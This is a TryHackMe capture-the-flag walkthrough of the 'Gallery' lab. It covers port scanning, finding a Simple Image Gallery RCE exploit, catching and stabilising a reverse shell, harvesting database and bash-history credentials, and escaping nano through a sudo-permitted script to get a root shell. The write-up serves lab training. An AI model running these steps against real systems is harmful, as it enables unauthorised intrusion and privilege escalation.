📝 TryHackMe. Walkthrough: Gallery
Task 1.
How many ports are open?
$ nmap -A 10.10.240.133
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Answer: *
What’s the name of the CMS?
On the :8080
port is the gallery. That’s where the title is.
Answer: S****e ****e *****ry
What’s the hash password of the admin user?
$ searchsploit Simple Image Gallery
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabiliti | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross- | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt
---------------------------------------------------------------------------------- ---------------------------------
$ searchsploit -m 50214
Exploit: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
URL: https://www.exploit-db.com/exploits/50214
Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/50214.py
File Type: Python script text executable, Unicode text, UTF-8 text, with very long lines (816)
Run the exploit, call the reverse shell and stabilize it:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL+Z to background the shell and also run the command on attacker machine
stty raw -echo ; fg
reset
[ This commands will give us a fully functional shell ]
Find the file with credentials for the database.
Next, upload adminer.php
for a convenient connection (or you can use the terminal) and find the table users
.
Answer: ****************79***be5********
What’s the user flag?
Exploring the file system, we find a backup of the home directory of the user mike
. In the file .bash_history
we find the password. We try to log in as a user.
After we have logged in as user mike
, all we have to do is to go into the directory /home/mike/
and read the file with the flag.
Task 2.
What’s the root flag?
See what we have in sudo
.
mike@gallery:/$ sudo --list
User mike may run the following commands on gallery:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
Let’s read rootkit.sh
.
mike@gallery:/$ cat /opt/rootkit.sh
cat /opt/rootkit.sh
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
versioncheck)
/usr/bin/rkhunter --versioncheck ;;
update)
/usr/bin/rkhunter --update;;
list)
/usr/bin/rkhunter --list;;
read)
/bin/nano /root/report.txt;;
*)
exit;;
esac
Run sudo /bin/bash /opt/rootkit.sh
select the read
option and get out of nano
into the shell:
^R^X
reset; sh 1>&0 2>&0
Answer: T*M{************3adfa6b8b************de87}